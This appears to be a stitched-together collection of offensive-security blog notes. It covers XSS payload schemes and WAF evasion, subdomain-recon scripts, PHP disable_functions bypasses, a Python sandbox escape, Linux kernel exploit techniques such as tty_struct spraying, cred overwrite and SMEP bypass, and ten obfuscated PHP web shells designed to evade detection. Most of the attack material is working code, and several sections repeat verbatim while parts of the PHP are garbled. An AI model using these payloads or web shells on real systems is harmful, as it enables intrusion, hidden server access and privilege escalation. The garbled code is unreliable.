Can be divided into Execution and Non-exe based on whether the injected load can be executed without any special assistance. Non-exe occurs when the input gets reflected within a HTML comment

<--$input-->

or between the following tags

<style>
<title>
<noembed>
<template>
<noscript>
<textarea>

These tags must be closed to execute payload. The only difference between executable and non-exe is the test of {closing tag} component.

</tag>
</tAg/x>
</tag{space}>
</tag//>
</tag%0a>
</tag%0d>
</tag%09>

If closing tag scheme is discovered

{closing tag}{any payload from executable payload section}

=> can used for successful injection.

Inside Tag

Primary character is the quote used to enclose the attribute value.

Example: input

<input value="$input" type="text">

-> Primary character “

In some cases, primary character is not required to break out.

Event Handler

Input reflected as the value of src attribute of script/iframe tag:

<script src="$input">

=> malicious script/web phishing..etc can be loaded directly

<script src="http://domain.com/malicious.js">

Bypass URL Matching Regular Expressions

//example.com/xss.js bypasses http(?s)://
////////example.com/xss.js bypasses (?:http(?s):?)?//
/\///\\/example.com/xss.js bypasses (?:http(?s):?)?//+

srcdoc

Input reflected as the value of srcdoc attribute of iframe tag:

<iframe srcdoc="$input">

an escaped (HTML entities) HTML document can be supplied as the payload

<iframe srcdoc="&lt;svg/onload=alert()&gt;">

Generic Attributes

All of the above cases do not require any bypassing techniques, except the last case can be omitted using the techniques used in the HTML context.

<input type="text" value=""/onfocus="alert()$input">

We have two categories based on the interactivity of the concerned tag:

Interactable

Input reflected in the tags can interact (clicking, hovering, focusing etc.,) only a quote is needed to break out.

{quote}{filler}{event_handler}{?filler}={?filler}{javascript}

Checking with WAF blocked using:

x"y

Event handler an important role here because this is the only component that possible detected by WAF. Each tag supports some event handlers and is up to the user to search for such cases, but there are some event handlers that can be linked to any of the tags:

onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onclick
onauxclick
ondblclick
ondrag
ondragend
ondragenter
ondragexit
ondragleave
ondragover
ondragstart

Intractable

Breakout of the tag is required to execute the payload if input reflected within a tag which cannot be interacted.

{quote}>{any payload scheme from html context section}

JavaScript

String Variable

The most common is reflection within a string variable. This is common because developers usually assign user input to a variable instead of using them directly

var name = '$input';

• {quote}{delimiter}{javascript}{delimiter}{quote}

• Where delimiter are usually JavaScript operators like ^.

• If user input in a single quoted string variable:

'%{javascript}%'
'|{javascript}|'
'<{javascript}<'
'>{javascript}>'
'^{javascript}^'
'*{javascript}*'
'+{javascript}+'
'/{javascript}/'

• {quote}{delimiter}{javascript}//

• Use a single line comment to comment the rest of the code in line to valid syntax.

'<{javascript}//'
'|{javascript}//'
'^{javascript}//

BLOCKS

Example

if (a > b){
 xnxx_func('');}}alert();if(true){('');
 }

First } close block

Second } dummy func as test

alert(); dummy function as test

if(true){ starts an if condition block to syntax valid.

(‘ combines with remains of function.

The payload structure depends on the code itself and this uncertainty makes it difficult to detect (can add obfuscated).

');%0a}%0d}%09alert();/*xnxx.com*/if(true){//xnxx.com%0a('

</scRipT{?filler}>{html xnxx.com}

can be used to break out and execute payload but easily detected.

Finally, testing in process hunter bug.

Name: ModSecurity
Name: Wordfence
Name: Cloudflare
Name: Akamai
Name: Comodo
Name: F5

There are many other firewall providers that I cannot provide publicly.
Sorry I cannot provide payload POC.

Web Application Firewall (WAF) Evasion Techniques
Edit descriptionmedium.com

Web Application Firewall (WAF) Evasion Techniques #2
Edit descriptionmedium.com

Numeric character reference - Wikipedia
A numeric character reference ( NCR) is a common markup construct used in SGML and SGML-derived markup languages such…en.wikipedia.org

The advanced in simple Recon!

For bug hunter, pentester, OSINTer, hacker =))))

Why we not create the auto with reconnaissance in a complex world. If really use full/right, we will save many time!

Eg: Like CORS scan etc.

You can also get some nice vulnerabilities for which you have done nothing! WTF =)))

We have to automate everything we can, not to miss it. I give a simple idea like workflow below to sequence problems.

1. Go to subdomain gathering

- Tools using:

+ Massdns

+ Altdns

+ Subfinder

We will using custom wordlist subdomain, write script for task.

• Bruceforce subdomain with massdns + wordlist subdomain

• After, run subfinder to get subdomains from many internet sources.

• after a moments, run altdns to get some change versions of the subdomains.

• Final, we can recursion to get levels deep for task get subdomains.

One more:

- Using massdns resolve list of subdomain generate.

#!/usr/bin/env bash

while getopts ":d:" opt; do
  case $opt in
    d)
      domain=$OPTARG
      ;;
  esac
done

if [[ -z "${domain// }" ]];
then
    echo "* Error fucking. Use -d example.com"
    echo "* Exit!"
    exit 1
fi

while read -r line
do
    echo "$line.$2" >> $3
done < $1

• Arguments:

+ Subdomain wordlist

+ Domain for generate subdomains

+ Output file

Subdomains wordlist:

+ https://github.com/danielmiessler/SecLists

+ https://github.com/Tim1512/subdomain_scanner/tree/master/wordlist

+ https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056

+ https://github.com/assetnote/commonspeak2-wordlists/blob/master/subdomains/subdomains.txt

+ https://github.com/pentester-io/commonspeak/blob/master/stackoverflow/output/compiled/stackoverflow_2017_10_22.urls_subdomains.txt

+ https://github.com/rbsec/dnscan

Example shell:

bash subdomains.sh subdomains-wordlist.txt $domain "wordlist.txt"

Resolve to online:

massdns -r resolvers.txt -q -t A -o S -w "result-online.txt" "wordlist.txt"

Filter subdomain output, eliminate miscellaneous things.

awk -F ". " '{print $1}' "result-online.txt" > "result-filtered.txt" && mv "wordlist-filtered.txt" "result-online.txt"

- Gather subdomains from many internet sources. Using Subfinder

subfinder -d $domain -nW -o "gather-online.txt" -rL resolvers.txt > /dev/null 2>&1

resolvers.txt is file with resolvers.

• After finish gather internet, we will unify them.

cat result-online.txt gather-online.txt > subdomains.txt

sort -u "subdomains.txt" -o "subdomains.txt"

• Altdns change the subdomains with a list of given words.

• Using technique, we can discover subdomains others wouldn’t have found.

./altdns.py -i "subdomains.txt"  -o "altdns-word.txt" -w words.txt

• After have list of all existing subdomains genarate, we will recursion them. Eg: demo.staging.dev.xnxx.com

• You can repeat bruteforcing before and thinking.

Final, we can remember example:

+ There might be a wildcard for subdomains, so there may be many false positive cases => Can insert a code snippet to detect wildcards.

if [[ "$(dig @1.1.1.1 A,CNAME {testxnxx123,testingforwildcard,xnxxxthinking}.$domain +short | wc -l)" -gt "1" ]]; then
    echo "* Possible wildcard. You can checking"
fi

+ Giving your own resolvers list to your tools, them can might increase the speed.
 + Clean your -online.txt files if output to big file.
 + Can using — verbose option for massdns
 + https://opendata.rapid7.com/sonar.fdns_v2/

Good luck. To be continue!

The advanced in simple Recon!

For bug hunter, pentester, OSINTer, hacker =))))

Why we not create the auto with reconnaissance in a complex world. If really use full/right, we will save many time!

Eg: Like CORS scan etc.

You can also get some nice vulnerabilities for which you have done nothing! WTF =)))

We have to automate everything we can, not to miss it. I give a simple idea like workflow below to sequence problems.

1. Go to subdomain gathering

- Tools using:

+ Massdns

+ Altdns

+ Subfinder

We will using custom wordlist subdomain, write script for task.

• Bruceforce subdomain with massdns + wordlist subdomain

• After, run subfinder to get subdomains from many internet sources.

• after a moments, run altdns to get some change versions of the subdomains.

• Final, we can recursion to get levels deep for task get subdomains.

One more:

- Using massdns resolve list of subdomain generate.

#!/usr/bin/env bash

while getopts ":d:" opt; do
  case $opt in
    d)
      domain=$OPTARG
      ;;
  esac
done

if [[ -z "${domain// }" ]];
then
    echo "* Error fucking. Use -d example.com"
    echo "* Exit!"
    exit 1
fi

while read -r line
do
    echo "$line.$2" >> $3
done < $1

• Arguments:

+ Subdomain wordlist

+ Domain for generate subdomains

+ Output file

Subdomains wordlist:

+ https://github.com/danielmiessler/SecLists

+ https://github.com/Tim1512/subdomain_scanner/tree/master/wordlist

+ https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056

+ https://github.com/assetnote/commonspeak2-wordlists/blob/master/subdomains/subdomains.txt

+ https://github.com/pentester-io/commonspeak/blob/master/stackoverflow/output/compiled/stackoverflow_2017_10_22.urls_subdomains.txt

+ https://github.com/rbsec/dnscan

Example shell:

bash subdomains.sh subdomains-wordlist.txt $domain "wordlist.txt"

Resolve to online:

massdns -r resolvers.txt -q -t A -o S -w "result-online.txt" "wordlist.txt"

Filter subdomain output, eliminate miscellaneous things.

awk -F ". " '{print $1}' "result-online.txt" > "result-filtered.txt" && mv "wordlist-filtered.txt" "result-online.txt"

- Gather subdomains from many internet sources. Using Subfinder

subfinder -d $domain -nW -o "gather-online.txt" -rL resolvers.txt > /dev/null 2>&1

resolvers.txt is file with resolvers.

• After finish gather internet, we will unify them.

cat result-online.txt gather-online.txt > subdomains.txt

sort -u "subdomains.txt" -o "subdomains.txt"

• Altdns change the subdomains with a list of given words.

• Using technique, we can discover subdomains others wouldn’t have found.

./altdns.py -i "subdomains.txt"  -o "altdns-word.txt" -w words.txt

• After have list of all existing subdomains genarate, we will recursion them. Eg: demo.staging.dev.xnxx.com

• You can repeat bruteforcing before and thinking.

Final, we can remember example:

+ There might be a wildcard for subdomains, so there may be many false positive cases => Can insert a code snippet to detect wildcards.

if [[ "$(dig @1.1.1.1 A,CNAME {testxnxx123,testingforwildcard,xnxxxthinking}.$domain +short | wc -l)" -gt "1" ]]; then
    echo "* Possible wildcard. You can checking"
fi

+ Giving your own resolvers list to your tools, them can might increase the speed.
 + Clean your -online.txt files if output to big file.
 + Can using — verbose option for massdns
 + https://opendata.rapid7.com/sonar.fdns_v2/

Good luck. To be continue!

Configuration

disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system

Linux

• sendmail -> exim bypass

<?php
$command_file = "/tmp/xxxx";
$output_file = "/tmp/xxxx";
$cmd = $argv[1] ? $argv[1] : $_GET['cmd'];
$cmd = "$cmd > $output_file";

file_put_contents($command_file, $cmd);
mail("root@localhost", "xnxx", "jav", null,
     '-xnxxjav@jav(tmp1 -be ${run{/bin/sh${substr{10}{1}{$tod_log}}'.$command_file.'}} tmp2)');
echo file_get_contents($output_file);
unlink($output_file);
unlink($command_file);

• LD_PRELOAD bypass

tools : Chankro

Windows

• use COM to bypass

<?php
$runCommand = "C:\\WINDOWS\\system32\\cmd.exe /c {$_GET['cmd']}"; //Wrong by purpuse to get some good output
$WshShell = new COM("WScript.Shell");
$output = $WshShell->Exec($runCommand)->StdOut->ReadAll;
echo "<p>$output</p>";
?>

Ref

• Yet Another PHP disable_functions Bypass

• how to bypass disable functions and open basedir

Bypass Python Sandbox

Python

__builtins__Is a reference to the following modules:

python2: __builtin__
python3: builtins

Tactic

1. Use the following code to access some modules:

[].__class__.__base__.__subclasses__()

2. Use the following code to access the module imported by a module:

module.__init__.__globals__

3. Some of the modules accessed at the first point are imported osor sysmodules:

python2:
<class 'site._Printer'>
<class 'site.Quitter'>
<class warnings.catch_warnings>
<class 'warnings.WarningMessage'>

python3:
<class '_sitebuiltins.Quitter'>
<class '_sitebuiltins._Printer'>

Then use the second point to access the os module.

4. Some poses can look at abusing and n poses in ref

some interesting stdandard modules

- https://docs.python.org/2/library/types.html 
types.FileType Read files
- https://docs.python.org/2/library/timeit.html 
timeit.timeit execute code
- https://docs.python.org/2/library/inspect.html
You can guess the code structure, like: inspect.getmembers
- https://docs.python.org/2/library/pickle.html 
pickle.loads execute command
- https://docs.python.org/2/library/os.html 
os.popen Execute commands
- https://docs.python.org/2/library/commands.html commands.getstatusoutput Execute commands
- https://docs.python.org/2/library/subprocess.html 
subprocess.popen Execute the command
- https://docs.python.org/2/library/io.html 
io.open Reading files
- https://docs.python.org/2/library/platform.html 
platform.popen command execution

final

Chestnut:

python3:
[w for w in 1..__class__.__base__.__subclasses__() if w.__name__=='Quitter'][0].__init__.__globals__['sy'+'s'].modules['o'+'s'].__dict__['sy'+'stem']('ls')

Reference

• bypassing-python-sandbox-by-abusing

• python-sandbox-bypass

• python-sandbox

• n poses for Python sandbox escape

• Python can be used in the standard library of bypass Sandbox

Configuration

disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system

Linux

• sendmail -> exim bypass

<?php
$command_file = "/tmp/xxxx";
$output_file = "/tmp/xxxx";
$cmd = $argv[1] ? $argv[1] : $_GET['cmd'];
$cmd = "$cmd > $output_file";

file_put_contents($command_file, $cmd);
mail("root@localhost", "xnxx", "jav", null,
     '-xnxxjav@jav(tmp1 -be ${run{/bin/sh${substr{10}{1}{$tod_log}}'.$command_file.'}} tmp2)');
echo file_get_contents($output_file);
unlink($output_file);
unlink($command_file);

• LD_PRELOAD bypass

tools : Chankro

Windows

• use COM to bypass

<?php
$runCommand = "C:\\WINDOWS\\system32\\cmd.exe /c {$_GET['cmd']}"; //Wrong by purpuse to get some good output
$WshShell = new COM("WScript.Shell");
$output = $WshShell->Exec($runCommand)->StdOut->ReadAll;
echo "<p>$output</p>";
?>

Ref

• Yet Another PHP disable_functions Bypass

• how to bypass disable functions and open basedir

Bypass Python Sandbox

Python

__builtins__Is a reference to the following modules:

python2: __builtin__
python3: builtins

Tactic

1. Use the following code to access some modules:

[].__class__.__base__.__subclasses__()

2. Use the following code to access the module imported by a module:

module.__init__.__globals__

3. Some of the modules accessed at the first point are imported osor sysmodules:

python2:
<class 'site._Printer'>
<class 'site.Quitter'>
<class warnings.catch_warnings>
<class 'warnings.WarningMessage'>

python3:
<class '_sitebuiltins.Quitter'>
<class '_sitebuiltins._Printer'>

Then use the second point to access the os module.

4. Some poses can look at abusing and n poses in ref

some interesting stdandard modules

- https://docs.python.org/2/library/types.html 
types.FileType Read files
- https://docs.python.org/2/library/timeit.html 
timeit.timeit execute code
- https://docs.python.org/2/library/inspect.html
You can guess the code structure, like: inspect.getmembers
- https://docs.python.org/2/library/pickle.html 
pickle.loads execute command
- https://docs.python.org/2/library/os.html 
os.popen Execute commands
- https://docs.python.org/2/library/commands.html commands.getstatusoutput Execute commands
- https://docs.python.org/2/library/subprocess.html 
subprocess.popen Execute the command
- https://docs.python.org/2/library/io.html 
io.open Reading files
- https://docs.python.org/2/library/platform.html 
platform.popen command execution

final

Chestnut:

python3:
[w for w in 1..__class__.__base__.__subclasses__() if w.__name__=='Quitter'][0].__init__.__globals__['sy'+'s'].modules['o'+'s'].__dict__['sy'+'stem']('ls')

Reference

• bypassing-python-sandbox-by-abusing

• python-sandbox-bypass

• python-sandbox

• n poses for Python sandbox escape

• Python can be used in the standard library of bypass Sandbox

Books: linux device driver

https://sysplay.github.io/books/LinuxDrivers/

Dynamically assigning device numbers

int alloc_chrdev_region(dev_t *dev, unsigned int firstminor, unsigned int count, char *name);

Dev is the outgoing parameter, which is the dynamically obtained device number.

Firstminor specifies the first minor.

Count and name are the same as the register_chrdev_region parameter definition.

https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch03s02.html

http://nanxiao.me/linux-kernel-note-20-device-major-minor-number

https://sysplay.github.io/books/LinuxDrivers

https://www.kernel.org/doc/Documentation/admin-guide/devices.txt

Statically initialize character devices:

struct cdev my_cdev;

cdev_init(&my_cdev, &fops);

my_cdev.owner = THIS_MODULE;

Linux character device driver cdev_init() series

Class related api

class_create,class_register

Extract the rootfs in cpio format

Rootfs.cpio is packaged first cpio and then gzipped

Decompression must first change rootfs.cpio to gz suffix and then decompress, otherwise it will report an error.

exploit tech & tricks

tty_struct spray

man 4 ptmx

Can understand:

When a process opens /dev/ptmx, it gets a file descriptor for a pseudoterminal master (PTM), and a pseudoterminal slave (PTS) device is created in the /dev/pts directory. Each file descriptor obtained by opening /dev/ptmx is an independent PTM with its own associated PTS, whose path can be found by passing the descriptor to ptsname(3).

That is to create a new one tty_struct, and this structure tty_struct has a field const struct tty_oprations* opswe can rewrite it to an address containing a pointer to a malicious function, such as when there is no SMAPtime can directly point to the user space, thus controlling the execution flow.

So in the case of uaf, you can spray a lot tty_structto occupy the chunk we released before, then uaf will opschange to its own address.

Reference practice：simple kernel exploit challenge

uaf use struct cred

And tty_struct sparysimilar, but also accounted for the pit, if forka child process can just make the child process credstructure into the position we want, then we can directly overwrite credthe contents in order to put right.

Reference practice：simple kernel exploit challenge

stack pivot

If the pointer is just called call rax, then you can change the pointer to xchg eax, espa gadget, then mmap a memory in the user space eax (ie xchg eax, espthe address of the gadget and the 0xffffffffbit and value), and then write the ropchain to the memory, ie It can be stack pivot

Eg:

159. unsigned long lower_address = xchgeaxesp & 0xFFFFFFFF;
160. unsigned long base = lower_address & ~0xfff;
161. printf("[+] Base address is %lx\n", base);
162. if (mmap(base, 0x30000, 7, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) != base) {
163.  perror("mmap");
164. exit(1);
165. }
166. 
167. unsigned long rop_chain[] = {
		......
180. };
181. memcpy((void*)lower_address, rop_chain, sizeof(rop_chain));

Mitigration

checksec

• Kaslr can cat /proc/cmdlinebe viewed by, if the option is open with kaslr, the kernel is not enabled by default.

• Smep can cat /proc/cpuinfocheck the flags by smep

Bypass

• SMEP smep is turned off by clearing the 20th bit of CR4, usually by the following gadget:

POP RDI ; RET // Place 00000000000006f0 in RDI MOV CR4 , RDI ;! RET // SMEP disbled     # 64- under-bit most is pop it 0x6f0 on the line

Reference：linux-kernel-x86–64-bypass-smep-kaslr-kptr_restric

something

• Rsp in the kernel is 8-byte aligned

• tty_structThe magic may be:

#define TTY_STRUCT_MAGIC 0x5402
#define TTY_MAGIC 0x5401

magic number

• mmapGenerally used when adding O_NOCTTY, because:

The flag O_NOCTTY can tell UNIX that this program will not become the "control terminal" on this port. 
If you don't do this, all the input, such as the Ctrl+C abort signal coming from the keyboard, will affect your process.

• I don’t know the size of the Linux kernel structure can compile a module, the module source code is used sizeofand then the compiler optimizes the reason, it will directly encode the size, and then objdump -dlook at the assembly to know the size, but also pay attention to the options.

• Defining kernel functions generally takes the following form (after the function address)

typedef int __attribute__((regparm(3)))(*commit_creds_func)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3)))(*prepare_kernel_cred_func)(unsigned long cred);

commit_creds_func commit_creds = (commit_creds_func)0xffffffff810a1420;
prepare_kernel_cred_func prepare_kernel_cred = (prepare_kernel_cred_func) 0xffffffff810a1810 ;

The use regparmis because the kernel function calling convention is different from the user mode. 32 bits use three registers to pass the first three parameters.

Refer to gcc function attribute.

Your are probably thinking normal calling convention (arguments on the stack). Modern Linux kernels (32-bit variants) pass the first 3 parameters in registers (EAX, ECX, EDX) as an optimization. Depending on the kernel this convention is specified as an attribute modifier on the functions using __attribute__(regparm(3)), or modern versions of the kernel pass -mregparm=3 option to GCC on the command line. The GCC documentation says this about that option/attribute:

Reference：Function parameter passing in a Linux kernel interrupt handler (from asm to C)

• Save the state of the user state:

unsigned long user_cs, user_ss, user_eflags;

void save_stats() {
    asm(
    "movq %%cs, %0\n"
            "movq %%ss, %1\n"
            "pushfq\n"
            "popq %2\n"
    :"=r"(user_cs), "=r"(user_ss), "=r"(user_eflags)
    :
    :"memory"
    );
}

Kernel Debug

start up

Qemu can directly add parameters -gdb tcp::23333, but pay attention to gdb connection server error, so use the set architecture i386:x86-64specified framework and then target remote :23333connect.

Reference: https://stackoverflow.com/questions/8662468/remote-g-packet-reply-is-too-long

kallsyms

Most of the time we are debugging drivers, and kallsyms has all the symbols in the kernel, including the driver module, so you can view the breakpoints of the module under kallsyms.

Making cpio, initramfs file system

Need two tools, one is to enter the kernel source code compilation:

make -C /usr/src/linux/usr/ gen_init_cpio

one is under the kernel source directory script

chmod +x usr/gen_init_cpio scripts/gen_initramfs_list.sh

Then create the initramfs file system with the following command:

gen_initramfs_list.sh initrd/ > filelist
gen_init_cpio filelist >initrd.img
gzip initrd.img
mv initrd.img initrd-`uname –r`.img

About cred structure

The first five fields of the default compiled cred are:

struct cred {
	 unsigned  long usage;
	unsigned  int uid;
	unsigned  int gid;
	unsigned  int south;
	unsigned  int sgid;
	unsigned  int euid;
	...
};

The test should clear all these fields to get root privileges. The usage field is related to the bit. Under 32 bits unsigned int, under 64 bits, the default cred structure is 0xa8 bytes.

Return user mode

The 64-bit uses the swapgssum iretq, the former exchanges the data of gs and MSR, and the latter pops up the data from the stack in the following order:

the next RIP
    user land CS
    user land EFLAGS
    user land RSP
    user land SS

Single file source kernel module compilation

Basic programming of kernel modules and writing of Makefiles

Get kernel compilation options

Sometimes we want to get the kernel compile time options, such as to get the size of a structure (in this case, there is not enough source code), you can get it by:

At runtime:

#Current kernel config:

cat /boot/config-`uname -r`

#Other installed kernels:

ls /boot/config-*

#The following three are possible

 /proc/config.gz
 /boot/config
 /boot/config-$(uname -r)

When you have a mirror: this time need to use the kernel source under scripts/extract-ikconfigscript to get the mirror in the config, but it also requires kernel enabled at compile time CONFIG_IKCONFIG_PROCoption.

Extract vmlinux from the compressed image

It scripts/extract-vmlinuxcan be easily extracted using the kernel source : ./extract-vmlinux bzImage > vmlinx

linux kernel

stack

Various stacks in Linux: process stack thread stack kernel stack interrupt stack

tty/pty/ptmx

Under Linux tty / pty / pts / ptmx Detailed ptmx and analysis terminal when the relationship is created pts

Call convention 64 bit

32-bit can refer to the above

A.2 AMD64 Linux Kernel Conventions

1. User-level applications use as integer registers for passing the sequence
%rdi, %rsi, %rdx, %rcx, %r8 and %r9. The kernel interface uses %rdi,
%rsi, %rdx, %r10, %r8 and %r9.

2. A system-call is done via the syscall instruction. The kernel destroys
registers %rcx and %r11.

3. The number of the syscall has to be passed in register %rax.
4. System-calls are limited to six arguments, no argument is passed directly on
the stack.

5. Returning from the syscall, register %rax contains the result of the
system-call. A value in the range between -4095 and -1 indicates an error,
it is -errno.

6. Only values of class INTEGER or class MEMORY are passed to the kernel.

source

free-electrons

I don’t understand for a while

It found that watching someone else rewrite wp tty_structof opseven apply for a piece of memory pointer after the write pointer opspoints to proc_fops:

struct tty_operations* fake_tty_operations = (struct tty_operations*) calloc(1, sizeof(struct tty_operations));
    void *fake_file_operations = calloc(1, 0x1000);

    fake_tty_operations->proc_fops = fake_file_operations;
    fake_tty_operations->ioctl = (int (*)())xchg_eax_esp_ret;

I don’t understand the intention for the time being…

Something you have seen

Writing kernel exploits

The post focused on the global variables GET, POST, REQUEST.

The most used functions:

(PHP 4, PHP 5, PHP 7) 
shell_exec - Execute command via shell and return the complete output as a string
 string shell_exec (string $ cmd)
EXEC-> php -r 'shell_exec ("ls -la");'

(PHP 4, PHP 5, PHP 7) 
system - Executes an external program and shows the output
 string system (string $ command [, int & $ return_var])
EXEC-> php -r 'system ("ls -la");'

(PHP 4, PHP 5, 7 PHP) 
exec - Execute external program
 string Exec (Command String $ [, $ & array output [int & return_var $]])
EXEC-> php -r 'exec ("ls -la", $ var); print_r ($ var);'

(PHP 4, PHP 5, PHP 7) 
passthru - Execute an external program and show the raw output
 void passthru (string $ command [, int & $ return_var]) 
EXEC-> php -r 'passthru ("ls -la", $ var); '

Simple implementation:

shell_exec: 
 if (isset ($ _ REQUEST ['cmd'])) {$ cmd = shell_exec ($ _ REQUEST ['cmd']);
 print_r ($ cmd);} 

system: 
 if (isset ($ _ REQUEST ['cmd'])) {system ($ _ REQUEST ['cmd']); }

exec:
 if (isset ($ _ REQUEST ['cmd'])) {exec ($ _ REQUEST ['cmd']); }

passthru:
 if (isset ($ _ REQUEST ['cmd'])) {passthru ($ _ REQUEST ['cmd']); }

We can use the same functions, but in an elaborate way avoiding that a simple “grep -E” reveals our access.

TIPS:

• Use of shellcode in fixed values.

• Array is life! Use without moderation.

• Concatenation of native functions & definition of variables.

• base64_decode — encode (data), bin2hex, error_reporting (0)

• Use requests (get or post) that already exist on the system.

• Study the creation of malicious properties in system’s class, create its functions.

• Handling values ​​of the global variable $ _SERVER.

• Study infection methods for CMS files made in PHP.

Let’s go to the examples

EXAMPLE 01
Functions:

1. ERROR_REPORTING

2. BASE64_DECODE

3. DEFINE

4. SYSTEM

5. EXIT

Variables: c3lzdGVt = system, dW5hbWUgLWE7bHM7 = uname -a; ls; , aWQ = = id
CODE:

(error_reporting (0)) ($ __ = @ base64_decode ("c3lzdGVt")) $ __ ( base64_decode ("aWQ ="))
. define ("_", "dW5hbWUgLWE7bHM7"). __ ( base64_decode (_)). exit );

Execution: curl -v ‘http://localhost/shell.php'

EXAMPLE 02
Functions:

1. ERROR_REPORTING

2. BASE64_DECODE

3. ISSET

4. PRINT

5. SYSTEM

6. EXIT

Variables: c3lzdGVt = system 
CODE:

(error_reporting (0) (= @ $ __. base64_decode ( "c3lzdGVt"))
 . print ($ __ ( Isset ($ _REQUEST [0]) REQUEST $ _ [0] NULL))?. EXIT );

Execution: curl -v ‘http://localhost/shell.php?0=id'

EXAMPLE 03

Functions:

1. ERROR_REPORTING

2. BASE64_DECODE

3. CREATE_FUNCTION — Creates an anonymous function (lambda-style)

4. SHELL_EXEC

5. EXIT

Variables: ZWNobyhzaGVsbF9leGVjKCRfKSk7 = echo (shell_exec ($ _)); 
CODE:

( Error_reporting (0)) ($ _ = $ _ REQUEST [0]).
 ($ __ = @. Create_function ( '$ _' base64_decode ( "ZWNobyhzaGVsbF9leGVjKCRfKSk7"))) ($ __ ($ _) exit..);

Execution: curl -v ‘http://localhost/shell.php?0=id'

EXAMPLE 04
Functions:

1. ERROR_REPORTING

2. VARIABLE FUNCTIONS

3. EXIT

Variables: $ _GET [1] = Function name, $ _GET [2] = command that will execute 
CODE:

( Error_reporting (0) (= @ $ _ $ _ GET [1]) (.. $ _ ($ _GET [2])). EXIT );

Execution: curl -v ‘http://localhost/shell.php?1=system&2=id;uname'

EXAMPLE 05

Functions:

1. ERROR_REPORTING

2. EXTRACT

3. GET_DEFINED_VARS

4. VARIABLE FUNCTIONS

5. DEFINE

6. EXIT

Variables: $ _REQUEST [1] = Function name, $ _REQUEST [2] = command that will execute

CODE:

( error_reporting (0)). ( extract ($ _REQUEST, EXTR_PREFIX_ALL))
($ _ = @ get_defined_vars () ['_ REQUEST']) ( define ('_', $ _ [2])) (($ _ [1] (_));

Execution: curl -v ‘http://localhost/shell.php?1=system&2=id;uname'

EXAMPLE 06
Functions:

1. ERROR_REPORTING

2. EXPLODE

3. BASE64_DECODE

4. VARIABLE FUNCTIONS

5. EXIT

Variables: SFRUUF9VU0VSX0FHRU5U = HTTP_USER_AGENT
CODE:

( error_reporting (0)). ($ _ = @ explode (',', $ _ SERVER [ base64_decode ('SFRUUF9VU0VSX0FHRU5U')]))
($ _ [0] ("{$ _ [1]")). exit ;

Execution: curl -v ‘http://localhost/shell.php' — user-agent’system,id;ls -la’

EXAMPLE 07
Functions:

1. ERROR_REPORTING

2. GET_DEFINED_VARS

3. VARIABLE FUNCTIONS

4. VARIABLE SHELLCODE

5. SYSTEM

6. EXIT

Variables: \x30=0, \x73=s, \x79=y, \x73=s, \x74=t, \x65=e, \x6D=m 
CODE:

( error_reporting (0)). ($ _ [0] [] = @ $ _ GET ["\ x30"])
($ _ [1] [] = "\ x73") ($ _ [1] [] = "\ x79").
($ _ [1] [] = "\ x6D") ($ _ [1] [] = "\ x65").($ ___. = $ __ [0]) 
($ __ = @ get_defined_vars () ['_'] [1])
($ ___. = $ __ [1]) ($ ___. = $ __ [2]) ($ ___. = $ __ [3])
. ($ = ___ __ $ [4].) ($ = $ __ ___ [5].) (($ ___ ( "{$ _ [0] [0]}"))... EXIT );

Execution: curl -v ‘http://localhost/shell.php?0=id;uname%20-a'

EXAMPLE 08
Functions:

1. ERROR_REPORTING

2. STR_REPLACE

3. VARIABLE FUNCTIONS

Variables: $ _REQUEST [0] = Command that will execute 
CODE:

( error_reporting (0)). ( str_replace ('$', '@', '#')
 , 's $ ## and @ # $ @ # $ @ # $ @ s $ # $ @ # $ ($ _ {$ _ REQUEST [0]}));

Execution: curl -v ‘http://localhost/shell.php?0=id

EXAMPLE 09
Functions:

1. ERROR_REPORTING

2. STR_REPLACE

3. VARIABLE FUNCTIONS

4. SYSTEM

Variables: $ _POST [‘shellrox’] = Command that will execute
CODE:

( error_reporting (0)). ($ _ = [("\ x73 \ x79").
("\ x74 \ x65 \ x6d"), "\ x73 \ x68 \ x65 \ x6c", "\ x6c \ x72 \ x6f \ x78"
($ _ [0] ($ _ POST [$ _ [1]. $ _ [2]]));

Execution: curl -d “shellrox=id;uname -a” -X POST ‘http://localhost/shell.php'

EXAMPLE 10

Functions:

1. NON ALPHA NUMERIC

2. VARIABLE FUNCTIONS

3. SYSTEM

CODE:

$ _ = ""; # we need a blank string to start
Eur-lex.europa.eu eur-lex.europa.eu # access part of the string to convert to an array
$ _ = $ _. ""; # convert the array into a string of "Array"
Eur-lex.europa.eu eur-lex.europa.eu # access the 0 index of the string "Array" which is "A"

# INCREASING VALUES TO FIND THE LETTERS
# IF YOU WANT TO MOUNT THE STRING SYSTEM

($ _ ++); #THE
($ _ ++); #B
($ _ ++); #W
($ _ ++); #D

# FIRST LETTER FOUND IS PLAYED IN A SECONDARY ARRAY
($ ___ [] = $ _ ++);

($ _ ++); #F
($ _ ++); #G
($ _ ++); #H
($ _ ++); #I
($ _ ++); #J
($ _ ++); #K
($ _ ++); #L

# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY

($ ___ [] = $ _ ++); # M

($ _ ++); #N
($ _ ++); #O
($ _ ++); #P
($ _ ++); #Q
($ _ ++); #R

# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY

($ ___ [] = $ _ ++);

# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY

($ ___ [] = $ _ ++); # T

($ _ ++); #U
($ _ ++); #V
($ _ ++); #W
($ _ ++); #X

# FINISHED LETTER IS PLAYED IN A SECONDARY ARRAY

($ ___ [] = $ _ ++);

(Z)

# ARRAY DEBUG:
/ * Array
(
    [0] => E
    [1] => M
    [2] => S
    [3] => T
    [4] => Y
)
* /

# MOUNT STRING WITH ARRAY FIELDS $ ___  
$ ___ [2]. $ ___ [4]. $ ___ [2]. $ ___ [3]. ___ [0]. ___ [1];

# USING ANONYMOUS FUNCTION TECHNIQUE FOR IMPLEMENTATION
$ _____ ('id; uname -a');

MINIMALIST VERSION:

($ _ = $ _ [+] "). ($ _ ++). ($ _ = $ _.
($ _ ++). ($ _ ++). ($ _ ++) ($ _ ++).
